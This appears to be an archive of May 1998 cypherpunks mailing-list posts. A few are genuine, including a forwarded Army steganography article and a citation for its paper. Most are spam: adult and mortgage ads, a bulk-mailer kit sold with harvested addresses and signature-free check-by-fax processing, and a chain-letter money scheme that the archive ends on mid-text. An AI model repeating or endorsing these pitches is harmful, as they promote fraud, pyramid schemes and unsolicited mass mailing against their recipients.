http://www.worldregister.com/english/stichworte/motivation.htm

Mask pattern of one free property query
http://www.worldregister.com/english/info/privat_11_2.htm

Mask pattern of a fee-based property listing
http://www.worldregister.com/english/info/privat_4_2.htm

Fraud prevention for insurance companies. General.
http://www.worldregister.com/english/info/versi_7.htm

Uncovering of fake theft
http://www.worldregister.com/english/info/versi_5.htm

Warding off of claims reported multiple times
http://www.worldregister.com/english/info/versi_8.htm

----------------------------------------------------------------
Your e-mail address is published on the Internet.  We believe that this
innovation interests you for professional reasons.  In advanced, we would
like to thank you for your time.  If you have any further questions, please
do not hesitate to contact us.

Sincerely,  WorldRegister, Werner Bachman.

Tel: +41 1 313 04 71  Fax: +41 1 313 04 68
----------------------------------------------------------------







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 23 May 1998 07:35:30 -0700 (PDT)
To: "Cypherpunks" <jya@pipeline.com>
Subject: Re: E-Commerce Enhancement Act
Message-ID: <199805231443.KAA25446@cti06.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 23 May 1998 09:30:01 -0400, John Young wrote:

>Excerpt from statement on introduction of S.2107, "Electronic
>Commerce Enhancement Act," May 21, 1998 :
[snip]
> The
>benefits to American businesses as they struggle to establish paper-
>free workplaces that will lower administrative costs, will be
>significant, and will further spur our national economy.

>Full statement: http://jya.com/s2107-intro.txt

one of my friend replied when I asked just *where* was the promised paperless office:
"as likely as a paperless toilet..."

:-)

Ciao

jfa

Jean-Francois Avon, Pierrefonds(Montreal) QC Canada
  JFA Technologies, R&D physicists & engineers
  Instrumentation & control, LabView programming.
PGP keys: http://bs.mit.edu:8001/pks-toplev.html
PGP ID:C58ADD0D:529645E8205A8A5E F87CC86FAEFEF891 
PGP ID:5B51964D:152ACCBCD4A481B0 254011193237822C






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kentroy <bigboots@apci.net>
Date: Sat, 23 May 1998 14:21:26 -0700 (PDT)
To: cypherpunks@toad.com
Subject: hello
Message-ID: <35673E3D.9C0B79F3@apci.net>
MIME-Version: 1.0
Content-Type: text/plain


TO whom ewver this concerns,

I came across your web page about making bumber stickers and was
iteresetes in purchasing some of the paper you talked about on your
page. If you can send me info or what everi need to purchase it you can
contact me at Vyncez@hotmail.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sat, 23 May 1998 18:42:32 -0700 (PDT)
To: j orlin grabbe <john.conyers@mail.house.gov
Subject: "TOP SECRET (TS), Sensitive Compartmented Information (SCI), CODEWORD"
Message-ID: <356778D1.310F@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain


Saturday 5/23/98 7:16 PM

J Orlin Grabbe  http://www.aci.net/kalliste/

Just saw subject heading. "TOP SECRET (TS), Sensitive Compartmented
Information (SCI), CODEWORD" 

But jya.com did not respond.

I will buy a refrigerator magnet at the National Atomic Museum
in Albquerque

         1945 509th COMPOSITE GROUP 1995
           FIRST ATOMIC BOMBARDMENT
             50th ANNIVERSARY

for you and Masanori TOO.

For business reasons perhaps I should buy the whole bowl full.

This is so gross they have to be worth some MONEY, $US, YEN, SF, DM, 
Ringitt, etc.

Later
bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nl0v@nl0vpg.net
Date: Sat, 23 May 1998 19:52:52 -0700 (PDT)
To: friends@internet.com
Subject: An invitation
Message-ID: <34755181_76443379>
MIME-Version: 1.0
Content-Type: text/plain



This is a one time mailing and is never sent unsolicited. Your email address was included in an "Opt-In" target list of those interested 
in receiving adult site advertizing.If you have received this message in error please delete it.

Looking for High Quality Video and Pics??? 
Visit our site - you will not be disappointed!!

http://www.oasis.nu/jenny 




 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 24 May 1998 02:35:14 -0700 (PDT)
To: StanSqncrs <StanSqncrs@aol.com>
Subject: (no subject)Re: Unix O/S
Message-ID: <199805240935.LAA03446@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


StanSqncrs wrote:
> 
> In a message dated 5/22/98 10:29:27 AM Central Daylight Time,
> nobody@REPLAY.COM writes:
> 
> << I'm starting a petition for less wasted bandwidth in cypherpunks. >>
> 
> You would.
> 
> << To show your support, just respond to this thread. >>
> 
> Oh, so there's no way we can show if we don't support your idea.  You create
> what we call an un-level playing field.
> 
> BUT, in this case, I think there's a simple way that you can have it so
> there's less wasted bandwidth here.  Ban anonomous posting.  ;-)
> 
> Stan

Stan,
   this is a petition. Unlike playing fields, petitions usually only
have one side, so your complaint is invalid.

Your new proposal merits inclusion, however. All those in favour of
banning anonymous posting can show their support by 
responding to the thread via an anonymous remailer.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tiikue43@netcom.com
Date: Sun, 24 May 1998 18:00:59 -0700 (PDT)
To: tiikue43@netcom.com
Subject: The Hidden Secrets of Mortgage Lenders
Message-ID: <19980524427WAA48163@earthlink.net.ur.mx>
MIME-Version: 1.0
Content-Type: text/plain


<HTML><PRE><BODY BGCOLOR="#c0c0c0"><FONT COLOR="#0000ff" SIZE=2><U><I>(this is a one time mailing only!!)</FONT><FONT COLOR="#000000" SIZE=3></U></I>


<FONT COLOR="#800000" SIZE=3>Dear Homeowner,

</P><P ALIGN=JUSTIFY>Would you like to pay off all your debts, including your mortgage in 5 to 8 years, without increasing your monthly payments?  Or are you happy paying 88% of the value of your home in interest during the first ten years?  Do you want to continue making the minimum payment on your charge cards, which could take you over 20 years to pay them off?  How can we do this?  With accelerators.

Accelerators are nothing new, large corporations have been using them for centuries.  Accelerators allow you to pay off the principal of your debts, therefore limiting the amount of interest that you owe.  The result can be a substantial reduction in the length of time an individual pays on his or her mortgage and consumer debts, and a dramatic reduction in the amount of total payments.

With accelerators you can eliminate your mortgage and debt in 5 to 8 years then take the same money you were using to pay off your debts and build true wealth during the time it would have taken you to pay off your mortgage originally.  You don't need to be a wall street wizard to make this work.  Let Equity 1st teach you how to avoid the pitfalls that cause most people to fail financially.

In our program, you will know how and when you will be out of debt, as well as when you will be financially independent and able to live off the income from your investments.

Most lenders want to keep you in debt as long as possible.  The longer you are in debt, the more interest you pay.  Equity 1st of Salt Lake City, Utah, has been helping people totally eliminate all their debts, and reach their financial goals, since the 1980's.

Whether you require a first mortgage, second mortgage, debt consolidation, debt restructuring, or mortgage acclerator program, I can help you with all your financing needs.  My network of nationwide lenders enables me to find the best interest rates available..  Programs are also available for homeowners with slow credit, little or no equity, or even bankruptcy.

The reality: 96% of all Americans fail to achieve financial independence.  Do you want to be in the 4% who do?

To learn more about how you can be debt free, and have all your financing options explained to you, click HERE<FONT COLOR="#800000" SIZE=3> to request more information, (place debt free, and your first name  in the subject).  If you prefer to speak with a Financial Consultant for a no obligation consultation, call toll free at 888-283-4899, in North Carolina call 910-777-8117.  Consultants are available Monday - Friday from 8:00am until 9:00pm and on Saturday between the hours of 9:00am to 12:00pm eastern standard time.  When calling have this ID code SRLM available.
</P><P ALIGN=LEFT>

Sincerely, 

Denise Whitaker 
Financial Consultant and Mortgage Lending Officer
</FONT><FONT COLOR="#000000" SIZE=3>

<FONT COLOR="#000000" SIZE=3>
</PRE></HTML




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: corvett52@yahoo.com
Date: Mon, 25 May 1998 13:08:13 -0700 (PDT)
To: Friend@public.com
Subject: The Internet Success ToolBox
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Note:We do not wish to send e-mail to anyone that does
not want it so please send an e-mail to:
corvett54@yahoo.com
You will be removed promptly.
*****************************************************************

"THE INTERNET SUCCESS TOOLBOX"
The Most Complete Marketing Software Package Available Anywhere!

This is what you will receive on  CD-ROM:

1. Stealth Mass Mailer ($399.00 value) - This unique, first of 
it's kind - software that allows you to easily send 250,000 e-mail 
messages an hour. Simply enough by making a single 
connection to the Internet using a standard modem, and connecting to
either 20 different mail servers, or a single mail server 20 times.

This, easy to use, software is designed for the basic computer 
user to understand. It's as easy as imputing the mail server, 
selecting the list of e-mail recipients to send to, inserting your 
e-mail address, adding your subject line, selecting your sales 
letter, and pressing send.

2. E-Mail Pro Extractor ($350.00 value) - This one of a kind software 
program is designed to manage and clean up any list of e-mail
addresses. It will purge duplicates, manage removes and delete
undeliverables. It will also separate and categorize your list of 
e-mail addresses by domain names.

The E-mail Pro Version 4.0 Bulk E-mail Loader also imports simple
text files that anyone can download from AOL, CompuServe, the
Internet, etc...These text files contain classified ads, forum 
messages, or data from the member directory. Each of these 
files are filled with e-mail addresses.

3. Check Deposit System ($125.00 value) - Check Deposit System 
Version 2.1 is a state of the art, revolutionary software that allows
you to easily and legally process checks by fax, phone or Internet.
The customer's signature on the check is not necessary. 

4. 16 Million E-mail Addresses ($149.00 value) - We took a total of 
over 92 million e-mail addresses from many of the touted CD's that 
are out there (bought them all - some were $300+)! We added the 
millions we had in storage to those. When we combined them all, 
we had in excess of 100+ million addresses in one huge file.

We then ran a super "sort/de-dupe" program against this 
huge list. It cut the file down to less than 25 million!! 

We then ran a program that contained 150+ keywords to 
remove addresses with vulgarity, profanity, sex-related 
names, postmaster, webmaster, flamer, abuse, spam, 
etc...Also we  eliminated all .edu, .mil., org., gov., etc...
After that list was run against the remaining list, it
reduced it down to near 16 million addresses!

So, you see, our list will save people hundreds of 
dollars buying all others that are out there on  CD. Using
ours will be like using the 100+ million that we started with, 
but a lot less money and a lot less time!

If you order "The Internet Success Toolbox" for $395.00
within the next 7 days, you'll also receive the following 
awesome bonuses absolutely FREE. 
A value of over $600.00 !!!

To order: 

____ YES!  I'm bursting with anticipation!  Please send me "The 
Internet Success Toolbox" so I can start advertising my business to 
"millions of people" - absolutely FREE!  I'm anxious to see how others 
are creating immediate "cash-flow explosions", and eliminating most of  
their advertising and marketing costs - and how I can do the same!  
Enclosed is $395.

____ YES AGAIN!  Because I'm responding within 7 days, I will receive 
6 BONUSES with a total value of $663.90 - absolutely FREE!  They include: 

BONUS #1 ($39 value): "Search Engine Secrets" - Discover the Most 
Powerful and Proven Strategies that really work to place you at the Top of
the Search Engines!

BONUS #2 ($195 value): A FREE one year subcription to "The Internet
Success Toolbox Newsletter" - my ticket to marketing and 
internet cash flow heaven!  

BONUS #3 ($39.95 value): Your Hotline List of "7000 Free Classified 
Ad Sites on the Internet" - a virtual GOLDMINE!  

BONUS #4 ($19.95 value): A FREE Special Report titled "How to Put Your 
Business on Automatic Pilot and Turn Your Marketing System Into a 
Predictable, Turnkey, Cash-Flow Machine That Keeps on Working - Even 
When You Don't!!"  
									
BONUS #5 ($195 value): Unlimited technical support.  Even though 
"The Internet Success Toolbox"  will be simple to use, it's great to 
know support is always available - if and when you really need it!  
And last but not least . . . .

BONUS #6 ($175 value): Order within 7 days and I'll also throw in a 
FREE VACATION CERTIFICATE good for 3 days and 2 nights of FREE 
lodging at one of over 30 "premier" resorts.

Some vacation spots you can choose from include: Hawaii; Orlando, 
FL; Las Vegas; Atlantic City; Palm Springs; Aruba - in the South Carribean;
Cancun, Mexico; and many, many more!

Hey, when you start making a TON of money, you'll wanna do some 
celebrating, won't you? So start packing those bags!

That's it. A lot more than you bargained for isn't it?

When you total all the goodies up, you're looking as a total value of 
$663.90! All yours - absolutely FREE - with your purchase of our amazing
 package  "The Internet Success Toolbox " for only $395.00.

And I'll even pay for shipping your package. You can have it in days. And 
start making money THE VERY SAME DAY!

Anyway, I have a copy right here on my desk reserved for you. All I need 
is your go ahead and I'll rush it out to you along with your 6 FREE BONUSES.	

___Yes, Also send me info on obtaining a Merchant Account so that I can take
credit cards for my business.

___I am interested in becoming a re-seller for your company. Please send 
re-seller information.
							

 Name _____________________________________________________

Street Address ____________________________________________

City)__________________State_______Zip_____________


Phone # (_____) ___________________________  

Fax # (______) _____________________

E-mail Address _________________________


___Visa  ___MasterCard

Total:$________

Account Number_____________________

Expiration Date____________________


I understand that all sales are final.


____________________________________
           Signature


To order by check:
***********************************************************

Tape or paste your check here
Fax it to us at: (425)379-9722
You do not need to send a hard copy of your check.
The fax is all we need.

(We are able to perform this service using our
Check Deposit System Software)

************************************************************


* Orders by Credit Card are shipped IMMEDIATELY.
  Fax completed order form to: (425) 379-9722

* Orders by personal, business or credit card CHECK are shipped in 7-10 
  business days.

* Orders MAILED IN or OVERNIGHTED with CASHIER'S CHECK  or MONEY ORDER are
  shipped IMMEDIATELY. Mail to: 
                       SYS
                       11014 19th Ave SE Suite 305 
                       Everett, WA 98208.
    
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 


									





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: iofferfun@bigfoot.com
Date: Mon, 25 May 1998 14:13:00 -0700 (PDT)
Subject: Have a peek
Message-ID: <199805252112.OAA25547@cygint.cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


I thought that you would be interested in these sites.  There are 
some interesting links on them.  You should check them out.

Arts sites: http://www.areyou.com/tt/arts.html
Automobile sites: http://www.areyou.com/tt/auto.html
Business Consultants sites: http://www.areyou.com/tt/bizcon.html
Business Opportunities sites: http://www.areyou.com/tt/bizop.html
Business Services sites: http://www.areyou.com/tt/bizserv.html
Computer Services sites: http://www.areyou.com/tt/comserv.html
Computer Software sites: http://www.areyou.com/tt/software.html
Money & Finance sites: http://www.areyou.com/tt/finance.html
Free Computer Products sites: 
http://www.areyou.com/tt/freecomputer.html
Gambling sites: http://www.areyou.com/tt/gambling.html
Games sites: http://www.areyou.com/tt/game.html
Health and Fitness sites: http://www.areyou.com/tt/fitness.html
Health Care Products sites: http://www.areyou.com/tt/health.html
Hobby collecting sites: http://www.areyou.com/tt/collecting.html
Home Business sites: http://www.areyou.com/tt/homebiz.html
Internet & Web Resources sites: 
http://www.areyou.com/tt/webres.html 
Marketing sites: http://www.areyou.com/tt/marketing.html
Shopping sites: http://www.areyou.com/tt/shopping.html
Sports sites: http://www.areyou.com/tt/sports.html

I hope you enjoyed them.

Liza







A mailing list was created for this promotion and will not be 
reused.  Each 
email address is permanently removed from the list after this 
letter is 
mailed.  However, if you still wish to email me with any questions 
or 
comments, please use the return address of this email.  Thank you 
for taking 
the time to read this material.
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Emery <die@pig.die.com>
Date: Mon, 25 May 1998 11:22:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: [rttyman@wwa.com: [Spooks] Digital Steganography]
Message-ID: <19980525142146.B3293@die.com>
MIME-Version: 1.0
Content-Type: text/plain


----- Forwarded message from Bob Margolis <rttyman@wwa.com> -----

Date: Mon, 25 May 1998 12:54:47 -0500
From: Bob Margolis <rttyman@wwa.com>
To: spooks@qth.net
Subject: [Spooks] Digital Steganography

Secret Messages: Army Researchers Discover Advance Technique To Relay
   Information

   Army researchers bring new meaning to the phrase, 'a picture's worth
   a thousand words.'

   An advanced technique for hiding secret messages inside of images is
   a new discovery made recently by U.S.Army Research Laboratory (ARL)
   researchers and a Federated Laboratory partner from the University of
   Delaware.

   "As a method to provide secure communications on the battlefield, we
   are pursuing research in the area of digital steganography," says
   Lisa Marvel, an electronics engineer at ARL's Information Science &
   Technology Directorate.

   The Greek word, steganography, means covered writing.

   "Our initial system involves embedding hidden messages within images.
   Images that are typically transmitted over the battlefield, such as
   weather or terrain maps," she says.

   The hidden message, be it an authentication mark, time stamp or new
   orders to a commander, is completely undetectable and resistant to
   removal and arbitrary decoding. Only the intended recipient holding
   the 'key' can decode the hidden message.

   Consider for a moment the impact of this new capability. U.S. Forces
   are pent behind enemy lines and out numbered three to one. The
   commander is not able to communicate their situation to base, because
   an enemy listener is detected on the communication network.

   The commander orders a message be sent through the Stego
   Communication System. In less than 45 seconds a soldier types the
   message on a laptop computer, hides the message in a map and sends it
   to base undetected. U.S. troops are deployed with enemy forces
   unaware of the impending ambush. U.S. soldiers are recovered with no
   casualties.

   Steganography is part of ARL's defensive information warfare efforts
   under the Federated Laboratory Program. The research began in
   February 1997 and is projected to continue over the next two years.

   "The result of this basic research can be packaged as software that
   can run on any laptop, anywhere. The main focus for the next two
   years is to increase the amount of undetectable information that we
   are able to hide in an image and develop techniques that make
   messages even more resilient to any kind of corruption," Marvel says.

   Typically, basic research is projected for use five years out. But,
   Marvel says this particular work is implementable in a shorter
   timeframe. She predicts that when the research is completed in two
   years it will just be a matter of software rewrite and packaging,
   which will take about 6 months before it can actually become a true
   product.

   Marvel credits the collaborative work, commissioned by the Federated
   Laboratory, for the successful progress of the project. Marvel
   developed the initial test system, guided by Dr. Charles Boncelet,
   Professor of electrical engineering at the University of Delaware.

   "Dr. Boncelet brought in some specific insights and his expertise in
   random signals and noise truly contributed to the success of the
   work," Marvel says.

   Dr. Charles Retter another ARL engineer provided his expertise in low
   rate error correcting codes, "which is key to how we are able to
   extract the message from the image without having the original
   image," she adds.

   Digital steganography is a new topic of research that incorporates
   ideas from communications, cryptography, information theory, and
   signal processing. So far, very little information exists in the
   formal literature on this topic, unlike digital watermarking which is
   currently a very active area of research.

   Although similar, steganography differs from watermarking in several
   aspects. For example, digital watermarking is used to embed a visible
   or invisible signature into a medium in order to indicate ownership,
   such as the station insignia seen in the bottom corner of a
   television screen during programming.

   Steganography, on the other hand, is used to encode a hidden message
   typically much larger than a signature, Marvel explains.

   In preparing to file for a patent, the ARL researchers are conducting
   the required background research on the prior art.

   "We found that a few basic techniques used over the years work pretty
   well, but are not nearly as sophisticated or complete. It appears
   that our technique is unique," Marvel concludes.

---
Submissions spooks@qth.net

----- End forwarded message -----

-- 
	Dave Emery N1PRE,  die@die.com  DIE Consulting, Weston, Mass. 
PGP fingerprint = 2047/4D7B08D1 DE 6E E1 CC 1F 1D 96 E2  5D 27 BD B0 24 88 C3 18





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ABrigano <ABrigano@aol.com>
Date: Mon, 25 May 1998 17:35:46 -0700 (PDT)
Subject: [MVW] Mailing List Additions ...
Message-ID: <93a5f2fe.356a0ab0@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello,

Recently, MVW has undergone an expansion of it's mailing list.  You have been
placed on the mailing list for Mohawk Valley Wrestling.  If you would like to
be removed from the mailing list, please, feel free to e-mail abrigano@aol.com
with the subject REMOVE and  you will be removed from the list immediately.

On the other hand, if you'd like to see some excellent e-wrestling cards that
will knock your socks off, stay tuned and read our mail once and a while.  You
won't be dissapointed.  I'll do my best to keep your intrest through each and
every card.  The 7 month old MVW as at it's hottest, and I want to share it
with you.

Thank You,
Anthony Brigano




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: global8888@yahoo.com
Date: Mon, 25 May 1998 21:02:11 -0700 (PDT)
To: Friend@public.com
Subject: The Internet Success ToolBox
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Note:We do not wish to send e-mail to anyone that does
not want it so please send an e-mail to:
global8889@yahoo.com
You will be removed promptly.
*****************************************************************

"THE INTERNET SUCCESS TOOLBOX"
The Most Complete Marketing Software Package Available Anywhere!

This is what you will receive on  CD-ROM:

1. Stealth Mass Mailer ($399.00 value) - This unique, first of 
it's kind - software that allows you to easily send 250,000 e-mail 
messages an hour. Simply enough by making a single 
connection to the Internet using a standard modem, and connecting to
either 20 different mail servers, or a single mail server 20 times.

This, easy to use, software is designed for the basic computer 
user to understand. It's as easy as imputing the mail server, 
selecting the list of e-mail recipients to send to, inserting your 
e-mail address, adding your subject line, selecting your sales 
letter, and pressing send.

2. E-Mail Pro Extractor ($350.00 value) - This one of a kind software 
program is designed to manage and clean up any list of e-mail
addresses. It will purge duplicates, manage removes and delete
undeliverables. It will also separate and categorize your list of 
e-mail addresses by domain names.

The E-mail Pro Version 4.0 Bulk E-mail Loader also imports simple
text files that anyone can download from AOL, CompuServe, the
Internet, etc...These text files contain classified ads, forum 
messages, or data from the member directory. Each of these 
files are filled with e-mail addresses.

3. Check Deposit System ($125.00 value) - Check Deposit System 
Version 2.1 is a state of the art, revolutionary software that allows
you to easily and legally process checks by fax, phone or Internet.
The customer's signature on the check is not necessary. 

4. 16 Million E-mail Addresses ($149.00 value) - We took a total of 
over 92 million e-mail addresses from many of the touted CD's that 
are out there (bought them all - some were $300+)! We added the 
millions we had in storage to those. When we combined them all, 
we had in excess of 100+ million addresses in one huge file.

We then ran a super "sort/de-dupe" program against this 
huge list. It cut the file down to less than 25 million!! 

We then ran a program that contained 150+ keywords to 
remove addresses with vulgarity, profanity, sex-related 
names, postmaster, webmaster, flamer, abuse, spam, 
etc...Also we  eliminated all .edu, .mil., org., gov., etc...
After that list was run against the remaining list, it
reduced it down to near 16 million addresses!

So, you see, our list will save people hundreds of 
dollars buying all others that are out there on  CD. Using
ours will be like using the 100+ million that we started with, 
but a lot less money and a lot less time!

If you order "The Internet Success Toolbox" for $395.00
within the next 7 days, you'll also receive the following 
awesome bonuses absolutely FREE. 
A value of over $600.00 !!!

To order: 

____ YES!  I'm bursting with anticipation!  Please send me "The 
Internet Success Toolbox" so I can start advertising my business to 
"millions of people" - absolutely FREE!  I'm anxious to see how others 
are creating immediate "cash-flow explosions", and eliminating most of  
their advertising and marketing costs - and how I can do the same!  
Enclosed is $395.

____ YES AGAIN!  Because I'm responding within 7 days, I will receive 
6 BONUSES with a total value of $663.90 - absolutely FREE!  They include: 

BONUS #1 ($39 value): "Search Engine Secrets" - Discover the Most 
Powerful and Proven Strategies that really work to place you at the Top of
the Search Engines!

BONUS #2 ($195 value): A FREE one year subcription to "The Internet
Success Toolbox Newsletter" - my ticket to marketing and 
internet cash flow heaven!  

BONUS #3 ($39.95 value): Your Hotline List of "7000 Free Classified 
Ad Sites on the Internet" - a virtual GOLDMINE!  

BONUS #4 ($19.95 value): A FREE Special Report titled "How to Put Your 
Business on Automatic Pilot and Turn Your Marketing System Into a 
Predictable, Turnkey, Cash-Flow Machine That Keeps on Working - Even 
When You Don't!!"  
									
BONUS #5 ($195 value): Unlimited technical support.  Even though 
"The Internet Success Toolbox"  will be simple to use, it's great to 
know support is always available - if and when you really need it!  
And last but not least . . . .

BONUS #6 ($175 value): Order within 7 days and I'll also throw in a 
FREE VACATION CERTIFICATE good for 3 days and 2 nights of FREE 
lodging at one of over 30 "premier" resorts.

Some vacation spots you can choose from include: Hawaii; Orlando, 
FL; Las Vegas; Atlantic City; Palm Springs; Aruba - in the South Carribean;
Cancun, Mexico; and many, many more!

Hey, when you start making a TON of money, you'll wanna do some 
celebrating, won't you? So start packing those bags!

That's it. A lot more than you bargained for isn't it?

When you total all the goodies up, you're looking as a total value of 
$663.90! All yours - absolutely FREE - with your purchase of our amazing
 package  "The Internet Success Toolbox " for only $395.00.

And I'll even pay for shipping your package. You can have it in days. And 
start making money THE VERY SAME DAY!

Anyway, I have a copy right here on my desk reserved for you. All I need 
is your go ahead and I'll rush it out to you along with your 6 FREE BONUSES.	

___Yes, Also send me info on obtaining a Merchant Account so that I can take
credit cards for my business.

___I am interested in becoming a re-seller for your company. Please send 
re-seller information.
							

 Name _____________________________________________________

Street Address ____________________________________________

City)__________________State_______Zip_____________


Phone # (_____) ___________________________  

Fax # (______) _____________________

E-mail Address _________________________


___Visa  ___MasterCard

Total:$________

Account Number_____________________

Expiration Date____________________


I understand that all sales are final.


____________________________________
           Signature


To order by check:
***********************************************************

Tape or paste your check here
Fax it to us at: (425)379-9722
You do not need to send a hard copy of your check.
The fax is all we need.

(We are able to perform this service using our
Check Deposit System Software)

************************************************************


* Orders by Credit Card are shipped IMMEDIATELY.
  Fax completed order form to: (425) 379-9722

* Orders by personal, business or credit card CHECK are shipped in 7-10 
  business days.

* Orders MAILED IN or OVERNIGHTED with CASHIER'S CHECK  or MONEY ORDER are
  shipped IMMEDIATELY. Mail to: 
                       SYS
                       11014 19th Ave SE Suite 305 
                       Everett, WA 98208.
    
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - 


									





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Mon, 25 May 1998 18:54:38 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Cite for "... [Spooks] Digital Steganography"
In-Reply-To: <19980525142146.B3293@die.com>
Message-ID: <Pine.SUN.3.91.980525202932.10331A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 25 May 1998, Dave Emery wrote:

=> ----- Forwarded message from Bob Margolis <rttyman@wwa.com> -----

	Hi, all.

=>    "As a method to provide secure communications on the battlefield, we
=>    are pursuing research in the area of digital steganography," says
=>    Lisa Marvel, an electronics engineer at ARL's Information Science &
=>    Technology Directorate.

	Lisa Marvel presented the paper, "Reliable Blind Information
Hiding for Images" at the last Info Hiding Workshop (2nd annual) in April.
Coauthored with C. Boncelet, Jr. (U. Delaware) and C. Retter (Also 
from US ARM), the paper describes spread-spectrum techniques for hiding 
a good 1-5 Kilobytes in a 512x512 greyscale image securely and w/ error 
correction.  

	The proceedings aren't out yet, but one of the conference-goers
was kind enough to put electronic versions of the papers online.  See:

	http://www.cl.cam.ac.uk/~fapp2/ihw98/papers.html

	The ARM paper is in session 1.

							-Xcott

 ,oooooooo8     o     ooooo@math.niu.edu  ---  http://www.math.niu.edu/~caj/
o888'   `88   ,888.    888  
888          ,8'`88.   888   "I have discovered a truly marvelous proof of
888o.   ,oo ,8oooo88.  888  this statement, which, unfortunately, this margin
`888oooo88 o88o  o888o 888  is too small to contain.  And my FUCKING word 
____________________8o888'__processor won't let me resize it."_______________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Tony Grendair" <lottdin@hotmail.com>
Date: Mon, 25 May 1998 21:49:49 -0700 (PDT)
To: d.linton@postoffice.worldnet.att.net
Subject: A Lottery You can Control The stakes In!
Message-ID: <19980526044859.14362.qmail@hotmail.com>
MIME-Version: 1.0
Content-Type: text/plain


A Lottery You Control the Odds IN?

Read the first few lines and see if you aren't at least intrigued.  Are 
you SURE you won't miss out?

OK. So this is another MLM, BUT, this is the best one I've ever seen. 
Firstly, the cost to me for starting in on this program = $20 US plus 
postage. That's it. Second, you actually get something for your money. 
Something truly useful. The package you receive contains detailed 
reports of (1) How to start a small business, something very popular in 
today's economy (2) How to find Gov't auctions. You'ld be surprised how 
many there are (3) Home based business and (4) How to start an Answering 
service. Each of the reports is very inciteful and will get you at least 
wondering what it would be like to control your own destiny. PLUS, this 
program gives you the chance to raise the start up capital, or just make 
a bunch of money. This is a lottery you control the stakes at. With a 
little effort you can easily turn 20 dollars into much more. Think just 
10 people over the entire Internet need to take a chance like I did. I 
only need a response of about .05%, that's .005 out of a hundred I reach 
with this program. This is my first time ever doing this and I can't see 
one reason it won't work and I'm a business student at one of the best 
schools in the country. Hey I might not need a summer job. Wouldn't that 
be sweet?

Throw your hand in and with a little work this could be the greatest 
thing that ever happened.  Remember, people get rich with these 
programs, that's why there out there, there is no reason it can't be 
you. Maybe nothing in this life is free but this may be as close as 
there is.

 
 Please accept my apology if this was sent to you in error!
 
 *******************************************************************
 
 You are about to possibly make $50,000--in less than 90 days
 
 Read the enclosed program...THEN READ IT AGAIN!
 
 ********************************************************************
 
 
 Dear Friend,
 	If you are looking to make some real money, and you don't want to 
spend
much  money to do it then this is for you.  This business will only cost 
you
$20 to get into, and that's not much when you consider some of the other 
offers
that  you will receive.  
 
 *********************************************************************
 Testimonial:
 	I am an Executive Director of a YMCA and would never do anything that 
I
thought  would be wrong.  So please take a look at the business program 
that we
are offering  you.  I think this is one of the safest investments that 
you 
 can make, and the rewards are outstanding $$$$.  It requires very 
little 
 effort on your part, and no hard selling.  Now that's what I've been
looking  for!
 
 	Many people have paid off debts, bought houses, taken vacations,
etc. with the  money they have made through this business, and believe 
me that it does
not take  long before the money starts to come in.  Within 5 to 7 days 
of sending
your  advertisement out via bulk e-mail you will start receiving orders 
for the
reports. 
  
You will have $5 bills overflowing your mailbox or PO Box. Many people
have  to pick their mail up at the window because all of the mail will 
not fit
into  the box!  Excited yet?
 
 	I was very skeptical too when I first received an advertisement about
this great  business opportunity, and passed on it many times--just 
deleting them
when I  received the offers.  Thank goodness someone sent me another 
chance.  
 	
 	The money has been rolling in now for about 9 weeks.  I have paid the
money  that I owed to state income tax, and paid off two other credit 
cards.  I
know  that in another 30 to 40 days I will be debt free, and how many 
people
can say  that now days?
 
 	We are only giving you the opportunity to help yourself to this
outstanding  money making opportunity.  The rest is up to you, but think 
about this. 
I have only spent about $100--$20 to order the reports and $80 to send 
bulk
emails, and I am almost debt free now.  Within another 3 to 4 weeks I 
will be
there--debt  free, and I never thought that would happen.  There is no 
other 
 opportunity that costs so little to get in, and to make such large sums
of money. 
  I urge you to act now.  I promise you will be very satisfied with the 
 results.         Butch Christy
 ******************************************
 
 	Please, if you have any questions about this program feel free to 
email
me with  your questions.  I will be glad to help you to financial 
freedom.  The
following  is the program and how it works, and please when you decide 
to act upon
this  great opportunity, follow all directions exactly.  Making changes 
 in the program in any way will result in lost income for you and 
others. 

 Thanks for taking the time to look at this program, and best wishes. 
  
                                           Jennifer Evans
 
  $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
 
 This is a LEGAL, MONEYMAKING PHENOMENON
 
 PRINT this letter, read the directions, THEN READ IT AGAIN!!!
 
  You are about to embark on the most profitable and unique program you 
may

 ever see.  Many times over, it has demonstrated and proven its ability 
to

 generate large amounts of money.  This program is showing fantastic
appeal  with a huge and ever-growing on-line population desirous of 
additional 
 income.  
 
 
 This is a legitimate, LEGAL, money-making opportunity.  It does not
require you to come in contact with people, do any hard work, and best 
